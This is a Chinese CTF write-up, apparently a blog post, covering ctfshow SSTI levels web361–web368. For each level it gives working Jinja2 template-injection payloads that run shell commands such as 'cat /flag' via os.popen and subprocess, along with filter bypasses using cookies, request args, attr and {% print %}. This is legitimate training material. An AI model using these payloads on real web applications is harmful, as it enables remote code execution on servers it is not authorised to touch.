首页 > 其他分享 >ctfshow-web入门-SSTI(web361-web368)上

ctfshow-web入门-SSTI(web361-web368)上

时间:2024-11-15 16:51:08浏览次数:3  
标签:__ web cookies .__ web368 request web361 __.__ name

目录

1、web361

2、web362

3、web363

4、web364

5、web365

6、web366

7、web367

8、web368


1、web361

测试一下存在 SSTI 注入

方法很多

(1)使用子类可以直接调用的函数来打

payload1:

?name={{''.__class__.__base__.__subclasses__()[94]["get_data"](0,"/flag")}}

payload2: 

?name={{''.__class__.__base__.__subclasses__()[407]('cat /flag',shell=True,stdout=-1).communicate()[0].strip()}}

(2)使用重载函数

payload3:

?name={{''.__class__.__base__.__subclasses__()[290].__init__.__globals__['os'].popen('cat /flag').read()}}

payload4: 

?name={{''.__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('ls').read()}}

payload5: 

?name={{''.__class__.__base__.__subclasses__()[292].__init__.__globals__['linecache']['os'].popen('ls /').read()}}}}

(3)使用内嵌函数

payload6:

?name={{''.__class__.__base__.__subclasses__()[446].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('whoami').read()")}}

对于这种没有过滤的,还有其他很多很多方法,这里就不列举了。

2、web362

开始过滤 

模糊测试看一下,过滤了 2 和 3 

随便拿个 payload 打吧:

?name={{''.__class__.__base__.__subclasses__()[94]["get_data"](0,"/flag")}}

3、web363

过滤了单双引号

方法也很多,这里采用 get 传参绕过: 

?name={{().__class__.__base__.__subclasses__()[94][request.args.m1](0,request.args.m2)}}&m1=get_data&m2=/flag

4、web364

过滤了 args

并且 post 传参不允许

那就传给 cookie 吧

?name={{().__class__.__base__.__subclasses__()[94][request.cookies.m1](0,request.cookies.m2)}}
cookie传入:m1=get_data;m2=/flag

5、web365

新增过滤中括号

原本是在上面的 payload 上改,但是要连续用两次 [],有点问题,我们换个 payload: 

?name={{().__class__.__base__.__subclasses__().pop(290).__init__.__globals__.pop(request.cookies.m1).popen(request.cookies.m2).read()}}

cookie:m1=os;m2=cat /flag

这个 payload 是一次性的,因为 pop 会删除里面的键,导致环境崩溃

更保险的是使用 __getitem__ ,方法同上

6、web366

新增过滤了下划线

前面的 payload 太长了,构造起来比较麻烦和乱

换个短点的 payload 结合过滤器绕过:

?name={{(lipsum|attr(request.cookies.m1)).os.popen(request.cookies.m2).read()}}
cookie:m1=__globals__;m2=cat /flag

7、web367

新增过滤 os

一起传给 cookie

?name={{(lipsum|attr(request.cookies.m1)).get(request.cookies.m3).popen(request.cookies.m2).read()}}

cookie:m1=__globals__;m2=cat /flag;m3=os

8、web368

双大括号中过滤了 request

但是 {% %} 中可用

payload:

?name={%print((lipsum|attr(request.cookies.m1)).get(request.cookies.m3).popen(request.cookies.m2).read())%}

cookie:m1=__globals__;m2=cat /flag;m3=os

标签:__,web,cookies,.__,web368,request,web361,__.__,name
From: https://blog.csdn.net/Myon5/article/details/143696459

相关文章

  • Python在web中的使用
    Python在Web中的使用非常广泛。以下是一些Python在Web开发中的常见用途:1.服务器端开发:Python可以用来编写服务器端代码,处理HTTP请求和响应。常见的PythonWeb框架有Django和Flask,它们提供了构建Web应用程序的常用功能,如路由、模板引擎、数据库集成等。2.网络爬虫:Python在......
  • NVR接入录像回放平台EasyCVR视频设备轨迹回放平台分发webrtc流地址无法播放是什么原因
    在现代安防领域,视频监控技术扮演着越来越重要的角色。EasyCVR视频汇聚平台以其卓越的兼容性和灵活性,为用户提供了一个强大的视频监控解决方案。该平台不仅能够满足基本的视频监控需求,还通过一系列高级功能,如视频转码、快照、告警处理等,极大地提升了监控系统的智能化水平和操作便捷......
  • 无插件H5播放器EasyPlayer.js网页web无插件播放器选择全屏时,视频区域并没有全屏问题的
    EasyPlayer.jsH5播放器,是一款能够同时支持HTTP、HTTP-FLV、HLS(m3u8)、WS、WEBRTC、FMP4视频直播与视频点播等多种协议,支持H.264、H.265、AAC、G711A、MP3等多种音视频编码格式,支持MSE、WASM、WebCodec等多种解码方式,支持Windows、Linux、Android、iOS全平台终端的H5播放器,使用简单......
  • 网页直播/点播播放器EasyPlayer.js网页web无插件播放器渲染页面出现倒挂的原因排查
    EasyPlayer.js网页web无插件播放器属于一款高效、精炼、稳定且免费的流媒体播放器,可支持多种流媒体协议播放,无须安装任何插件,起播快、延迟低、兼容性强,使用非常便捷。EasyPlayer.js播放器不仅支持H.264与H.265视频编码格式,也能支持WebSocket-FLV、HTTP-FLV、HLS(m3u8)、WebRTC、ws......
  • 第14章 Nginx WEB服务器企业实战
    万维网(WORLDWIDEWEB,WWW)服务器,也称之为WEB服务器,主要功能是提供网上信息浏览服务。目前主流的WEB服务器软件包括:Apache、Nginx、Lighttpd、IIS、Resin、Tomcat、WebLogic、Jetty。本章介绍Nginx高性能WEB服务器、Nginx工作原理、安装配置及升级、Nginx配置文件深入剖析......
  • Stable Diffusion Web UI - Checkpoint、Lora、Hypernetworks
    Checkpoint、Lora、Hypernetworks是StableDiffusionWebUI生图的重要工具,它们有各自的特点,结合不同的生图场景选择一个或者多个叠加使用,能够更好的命令StableDiffusion生成理想状态的图片。以人像生图用通俗的方式解释checkpoint:必不可少的模型,全局生成模型,图像的生成......
  • 【stable diffusion部署】本地部署Stable Diffusion Webui
    前言在国内使用SD的途径大致有这些:某定制整合包、大厂服务器网络部署、原版安装。使用某定制版整合包在国内应该是属于大部分。这个整合包对SD在国内的推广普及起到了很重要的作用,但也有其不足之处。比如整合包体量庞大,动不动就是10G以上,里面包含了各种定制者自己部署的插......
  • 【安全工具】Web漏洞扫描十大工具(非常详细),零基础入门到精通,看这一篇就够了
    文章目录漏洞扫描十大工具AwVSNexposeOpenVASWebScarabWebInspectWhisker/libwhiskerBurpsuiteWiktoWatchfireAppScanN-StealthNmapp0fISSNessusXprobe文末福利漏洞扫描十大工具AwVSAwVS是一款知名的Web网络漏洞扫描工具,它通过网络爬虫测试你的网站安全,检测流行......
  • WebGL网页带参传入遇坑记录
    项目场景:网页打开WebGL带参数传入的解决方案。然而本人并没有系统的学习过JavaScript,导致踩得坑有点多,特记录一下。问题分析在index.html中获取的参数,传入到unity当中去使用,试了网上的很多种办法,有用xxx.jslib的,但此方法仅限于网页打开的index.html就为最终需要打开的位......
  • .NetCore 6.0 Blazor WebAssembly 开发网页部署到IIS上
    一、安装、启用IIS服务使用ctrl+r打开运行输入optionalfeatures打开Windows功能管理窗口 开启Internet服务,点击确定 重启电脑开启IIS,查看IIS是否正常启动 打开默认IIS默认网站,查看是否正常开启 出现下图,即开启IIS服务成功二、安装.NETCoreSDK下载.NET......